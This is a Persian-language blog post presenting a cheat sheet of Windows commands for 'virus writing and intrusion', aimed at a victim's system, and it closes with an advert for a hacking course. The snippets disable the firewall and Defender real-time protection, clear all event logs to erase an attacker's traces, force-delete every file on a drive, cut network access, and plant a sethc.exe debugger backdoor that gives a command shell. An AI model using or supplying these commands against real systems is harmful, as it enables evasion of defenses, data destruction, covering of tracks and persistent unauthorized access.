کدهای مخرب برای ویروس نویسی و نفوذ
تیکه کدهای مخرب برای ویروس نویسی و نفوذ
کدهای مخرب برای ویروس نویسی و نفوذ :
با سلام خدمت همگی کاربرای عزیز
توی این پست یکسری کدهای مخرب قرار میدم و قراره هر از چند گاهی این پست بروزرسانی بشه
البته مخرب بودن این کدها بستگی به نظر شما داره و ممکنه از دید یه کاربر کاربردی باشه و از دید یه کاربر دیگه مخرب !!!
اما چون بحث ما ویروس نویسی هستش به همین خاطر بهتره که از دید یه کد مخرب بهش نگاه کنیم و بیشترین کاربردشو توی نفوذ بدونیم
کد از کار انداختن فایروال سیستم قربانی
Netsh advfirewall set allprofiles state off
کد فعال کردن فایروال
Netsh advfirewall set allprofiles state on
کد فعال کردن تلنت برای ویندوز ۷ و ۸ و ۱۰
برای ویندوز XP هم بصورت پیشفرض فعال هستش…
Dism /online /Enable-Feature /FeatureName:TelnetClient
کد غیر فعال کردن تلنت
Dism /online /Disable-Feature /FeatureName:TelnetClient
کد خالی کردن Event Log و حذف رد پای کوچکی از حمله ی هکر
For /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
کد از کار انداختن آنتی ویروس
دقت کنین برای اینکار اگه دسترسی بالایی هم داشته باشیم نمیشه اینکار رو انجام داد
پس مجبوریم از یه تکه کد پاورشل برای اینکار استفاده کنیم که اینجوری میشه
start Powershell Set-MpPreference -DisableRealtimeMonitoring $true
کد از کار انداختن اینترنت سیستم
با استفاده از این دستور ما میتونیم آی پی خودمون رو پاک کنیم که اینکار باعث میشه دیگه اینترنت کار نکنه
البته اگه به شبکه متصل باشیم اینترنت کل سیستم های داخل شبکه از کار میفته که برای جلوگیری از اینکار هم میتونیم اسم سیستم رو بعد از نوشتن دستور بنویسیم
IPconfig /Release
و اگر هم میخواین مجددا اینترنتتون درست بشه
میتونین از دستور پایین استفاده کنین که البته آی پی سیستمتون هم عوض میشه ( داخل شبکه )
برای جلوگیری از تغییر آی پی همه سیستم های شبکه هم میتونین کاری که برای تکه کد قبلی گفتم رو انجام بدید
IPconfig /ReNew
با استفاده از کد پایین میتونیم دخل اطلاعات یکی از درایوهای سیستم قربانی رو پایین بیاریم که اینجا درایو مد نظر من درایو D هستش
For /R D:\ %i in (*) do del /F /S /Q %i CLS
البته تو کد بالا میتونیم به جای ستاره از نقطه هم استفاده کنیم و به جای del هم از RmDir استفاده کنیم
تا دخل فولدرهای یه درایو پایین بیاد
ایجاد درب پشتی روی سیستم قربانی
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe
کد بالا میتونه گاهی مواقع به کمک خودتونم بیاد
مثلا برای امنیت بیشتر خودتون یه برنامه تهیه کنید که یه رمز توی ورودی بگیره و اگه اون رمز درست بود دسترسی به خط فرمان رو آزاد کنه
یا اینکه میتونین زمانی که رمز سیستم یادتون میره ازش استفاده کنید
کد تغییر تصویر زمینه ی سیستم قربانی
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d Masir-Aks /f
تو کد بالا به جای Masir-Aks باید مسیر عکستون رو قرار بدین
امیدوارم این مقاله برای شما مفید واقع شده باشه ، در پایان پیشنهاد می کنم ، حتما از دوره ویژه ما در رابطه با هک و امنیت هم دیدن کنید .
دیدگاه ها